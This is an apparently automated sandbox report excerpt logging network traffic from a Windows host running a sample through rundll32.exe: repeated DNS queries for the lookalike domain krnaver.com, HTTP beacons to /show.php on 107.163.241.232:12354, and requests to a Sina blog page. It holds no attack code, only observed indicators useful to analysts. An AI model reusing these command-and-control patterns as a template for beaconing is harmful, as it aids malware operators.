                                              Dec 11, 2024 16:28:16.012305975 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:16.012387037 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:16.012691975 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:16.016046047 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:16.130398035 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:16.133729935 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:17.591717958 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:17.591929913 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.595618010 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.595645905 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:17.595694065 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.599040985 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.599054098 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:18.018764019 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.018821001 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.019584894 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.020347118 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.127376080 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.127449036 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.145737886 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.145749092 CET1235458942107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.145915031 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.278245926 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.398493052 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.403424978 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.523380041 CET1235458942107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.708439112 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.829813004 CET1235458949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.829907894 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.831192017 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.951471090 CET1235458949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:19.291626930 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.291703939 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.292280912 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.292330027 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.295629025 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.295660019 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.295708895 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.405724049 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.406006098 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.525404930 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.525480032 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.526846886 CET8059494202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.526916981 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.527522087 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.646805048 CET8059494202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.790916920 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.790955067 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.790993929 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.791588068 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.905932903 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.906908989 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.913728952 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:19.913830042 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.914355040 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:20.025654078 CET8060001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:20.025731087 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:20.026429892 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:20.026482105 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:20.029805899 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:20.030239105 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:20.034282923 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:20.149739027 CET8060001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:20.149959087 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.019660950 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.019711018 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.020529985 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.020859957 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.144299030 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.144316912 CET1235460904107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.144395113 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.145262957 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.145302057 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.146188021 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.146310091 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.146903992 CET6093712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.168234110 CET8060001202.108.0.52192.168.2.4
                                              Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                              Dec 11, 2024 16:27:55.098858118 CET6232253192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:55.236649036 CET53623221.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:00.099330902 CET5345753192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:00.239818096 CET53534571.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:05.088124990 CET5671053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:05.224874973 CET53567101.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:10.107696056 CET5651053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:10.244606972 CET53565101.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:10.259996891 CET5651053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:10.398324966 CET53565101.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:15.093828917 CET5331553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:15.235644102 CET53533151.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:20.088032007 CET5082353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:20.225198030 CET53508231.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:25.091897011 CET6439653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:25.231486082 CET53643961.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:30.196170092 CET5641953192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:30.332972050 CET53564191.1.1.1192.168.2.4
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Dec 11, 2024 16:24:30.774204969 CET | 192.168.2.4 | 1.1.1.1 | 0x66f8 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:35.091752052 CET | 192.168.2.4 | 1.1.1.1 | 0x8412 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:37.529467106 CET | 192.168.2.4 | 1.1.1.1 | 0xcdc0 | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:40.168365002 CET | 192.168.2.4 | 1.1.1.1 | 0x9e73 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:45.619990110 CET | 192.168.2.4 | 1.1.1.1 | 0xc194 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:50.105223894 CET | 192.168.2.4 | 1.1.1.1 | 0xd2d1 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:55.091144085 CET | 192.168.2.4 | 1.1.1.1 | 0x357d | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:00.120704889 CET | 192.168.2.4 | 1.1.1.1 | 0x87ed | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:05.152249098 CET | 192.168.2.4 | 1.1.1.1 | 0xe022 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:10.192047119 CET | 192.168.2.4 | 1.1.1.1 | 0xacbd | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:15.104394913 CET | 192.168.2.4 | 1.1.1.1 | 0x7d59 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:20.135457993 CET | 192.168.2.4 | 1.1.1.1 | 0xf85e | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:25.119688034 CET | 192.168.2.4 | 1.1.1.1 | 0x5e53 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:30.166443110 CET | 192.168.2.4 | 1.1.1.1 | 0xf990 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:35.120079041 CET | 192.168.2.4 | 1.1.1.1 | 0x3c47 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:40.210174084 CET | 192.168.2.4 | 1.1.1.1 | 0x7fbb | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:45.103955030 CET | 192.168.2.4 | 1.1.1.1 | 0x3eac | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:50.088627100 CET | 192.168.2.4 | 1.1.1.1 | 0x8965 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:25:55.088614941 CET | 192.168.2.4 | 1.1.1.1 | 0x19ab | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:00.088588953 CET | 192.168.2.4 | 1.1.1.1 | 0x4601 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:05.088643074 CET | 192.168.2.4 | 1.1.1.1 | 0xfa84 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:10.089994907 CET | 192.168.2.4 | 1.1.1.1 | 0xfb70 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:15.092192888 CET | 192.168.2.4 | 1.1.1.1 | 0x682a | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:20.087965012 CET | 192.168.2.4 | 1.1.1.1 | 0xfc11 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:25.089855909 CET | 192.168.2.4 | 1.1.1.1 | 0x956a | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:30.088426113 CET | 192.168.2.4 | 1.1.1.1 | 0xbd4b | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:35.278353930 CET | 192.168.2.4 | 1.1.1.1 | 0x461c | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:40.088145018 CET | 192.168.2.4 | 1.1.1.1 | 0x5d58 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:45.130080938 CET | 192.168.2.4 | 1.1.1.1 | 0x9997 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:49.626477957 CET | 192.168.2.4 | 1.1.1.1 | 0x4484 | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:50.088113070 CET | 192.168.2.4 | 1.1.1.1 | 0x5941 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:55.088515043 CET | 192.168.2.4 | 1.1.1.1 | 0x96e8 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:00.087887049 CET | 192.168.2.4 | 1.1.1.1 | 0x409c | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:05.092292070 CET | 192.168.2.4 | 1.1.1.1 | 0x1926 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:10.095103025 CET | 192.168.2.4 | 1.1.1.1 | 0x240 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:15.092111111 CET | 192.168.2.4 | 1.1.1.1 | 0x3bb6 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:20.087919950 CET | 192.168.2.4 | 1.1.1.1 | 0xb6ca | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:25.115286112 CET | 192.168.2.4 | 1.1.1.1 | 0xbbb2 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:30.088248014 CET | 192.168.2.4 | 1.1.1.1 | 0xa87f | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:35.286341906 CET | 192.168.2.4 | 1.1.1.1 | 0xf3bd | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:40.314431906 CET | 192.168.2.4 | 1.1.1.1 | 0x52c4 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:45.092597008 CET | 192.168.2.4 | 1.1.1.1 | 0x6ac1 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:50.157186031 CET | 192.168.2.4 | 1.1.1.1 | 0xfbd1 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:27:55.098858118 CET | 192.168.2.4 | 1.1.1.1 | 0x9043 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:00.099330902 CET | 192.168.2.4 | 1.1.1.1 | 0x46e | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:05.088124990 CET | 192.168.2.4 | 1.1.1.1 | 0xab2e | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:10.107696056 CET | 192.168.2.4 | 1.1.1.1 | 0xd719 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:10.259996891 CET | 192.168.2.4 | 1.1.1.1 | 0xd719 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:15.093828917 CET | 192.168.2.4 | 1.1.1.1 | 0x2aed | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:20.088032007 CET | 192.168.2.4 | 1.1.1.1 | 0xee39 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:25.091897011 CET | 192.168.2.4 | 1.1.1.1 | 0x3b78 | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:28:30.196170092 CET | 192.168.2.4 | 1.1.1.1 | 0xb6d | Standard query (0) | krnaver.com | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 11, 2024 16:24:37.668656111 CET | 1.1.1.1 | 192.168.2.4 | 0xcdc0 | No error (0) | blog.sina.com.cn | blogx.sina.com.cn | - | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 11, 2024 16:24:37.668656111 CET | 1.1.1.1 | 192.168.2.4 | 0xcdc0 | No error (0) | blogx.sina.com.cn | - | 202.108.0.52 | A (IP address) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:50.331423044 CET | 1.1.1.1 | 192.168.2.4 | 0x4484 | No error (0) | blog.sina.com.cn | blogx.sina.com.cn | - | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 11, 2024 16:26:50.331423044 CET | 1.1.1.1 | 192.168.2.4 | 0x4484 | No error (0) | blogx.sina.com.cn | - | 202.108.0.52 | A (IP address) | IN (0x0001) | false
                                              • blog.sina.com.cn
                                              • 107.163.241.232:12354
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.4 | 49753 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:34.035761118 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.4 | 49754 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:34.045511961 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49771 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:36.399374008 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.4 | 49772 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:36.399468899 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.4 | 49780 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:37.807125092 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Dec 11, 2024 16:24:39.390270948 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.4 | 49788 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:38.640598059 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.4 | 49790 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:38.764035940 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.4 | 49805 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:40.412738085 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.4 | 49807 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:40.525108099 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.4 | 49808 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:40.528368950 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Dec 11, 2024 16:24:42.096566916 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.4 | 49823 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:42.721698999 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.4 | 49826 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:42.859102011 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.4 | 49842 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:44.435282946 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.4 | 49844 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:44.543629885 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Dec 11, 2024 16:24:46.116806984 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:45 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.4 | 49845 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:44.546982050 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.4 | 49860 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:46.678975105 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.4 | 49861 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:46.799393892 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.4 | 49873 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:48.632174015 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.4 | 49876 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:48.760859013 CET | 184 | OUT | GET /show.php HTTP/1.1
